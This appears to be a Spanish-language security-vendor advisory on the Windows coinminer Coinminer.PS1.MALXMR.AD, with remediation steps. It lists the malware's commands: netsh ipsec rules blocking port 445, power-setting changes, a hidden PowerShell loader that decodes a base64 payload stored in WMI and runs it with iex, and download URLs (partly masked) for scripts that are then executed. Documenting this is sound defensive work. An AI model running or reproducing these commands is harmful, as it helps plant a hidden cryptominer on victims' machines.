Coinminer.PS1.MALXMR.AD
Windows
Tipo de malware
Coinminer
Destructivo?
No
Cifrado
Sí
In the Wild:
Sí
Resumen y descripción
Después ejecuta los archivos descargados. Como resultado, en el sistema afectado se muestran las rutinas maliciosas de los archivos descargados.
Detalles técnicos
Instalación
Agrega los procesos siguientes:
- findstr.exe /i /m /c:cryptonight c:\windows\explorer.exe;
- netsh.exe ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445;
- netsh.exe ipsec static add filteraction name=block action=block;
- netsh.exe ipsec static add filterlist name=block;
- netsh.exe ipsec static add policy name=netbc;
- netsh.exe ipsec static add rule name=block policy=netbc filterlist=block filteraction=block;
- netsh.exe ipsec static set policy name=netbc assign=y;
- NETSTAT.EXE -anop tcp;
- powercfg.exe /CHANGE -hibernate-timeout-ac 0;
- powercfg.exe /CHANGE -standby-timeout-ac 0;
- powershell.exe -NoP -NonI -W Hidden -E {base64 encoded data}==;
- powershell.exe -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')";
- schtasks.exe /delete /tn yastcat /f;
Otras modificaciones del sistema
Agrega las siguientes entradas de registro:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\IPSec
OperationMode = 3
Rutina de descarga
Accede a los siguientes sitios Web para descargar archivos:
- http://111.{BLOCKED}.{BLOCKED}.149/antivirus.ps1
- http://111.{BLOCKED}.{BLOCKED}.149/logos.png
- http://111.{BLOCKED}.{BLOCKED}.149/ver.txt
- http://update.win{BLOCKED}fender{BLOCKED}st.com/antivirus.ps1
- http://update.win{BLOCKED}fender{BLOCKED}st.com/logos.png
- http://update.win{BLOCKED}fender{BLOCKED}st.com/ver.txt
Después ejecuta los archivos descargados. Como resultado, en el sistema afectado se muestran las rutinas maliciosas de los archivos descargados.
Soluciones
Step 1
Los usuarios de Windows ME y XP, antes de llevar a cabo cualquier exploración, deben comprobar que tienen desactivada la opción Restaurar sistema para permitir la exploración completa del equipo.
Step 3
Reiniciar en modo seguro
Step 4
- Haga clic en Inicio>Programas>Accesorios>Herramientas del sistema>Administrador de tareas
- Haga doble clic en un archivo de tarea.
- Compruebe si la ruta y el nombre del malware están en la casilla Ejecutar: .
- Si es así, elimine el archivo de la tarea.
- Repita los pasos 2 a 4 para las tareas restantes.
Step 5
Reinicie en modo normal y explore el equipo con su producto de Trend Micro para buscar los archivos identificados como Coinminer.PS1.MALXMR.AD En caso de que el producto de Trend Micro ya haya limpiado, eliminado o puesto en cuarentena los archivos detectados, no serán necesarios más pasos. Puede optar simplemente por eliminar los archivos en cuarentena. Consulte esta página de Base de conocimientos para obtener más información.
Rellene nuestra encuesta!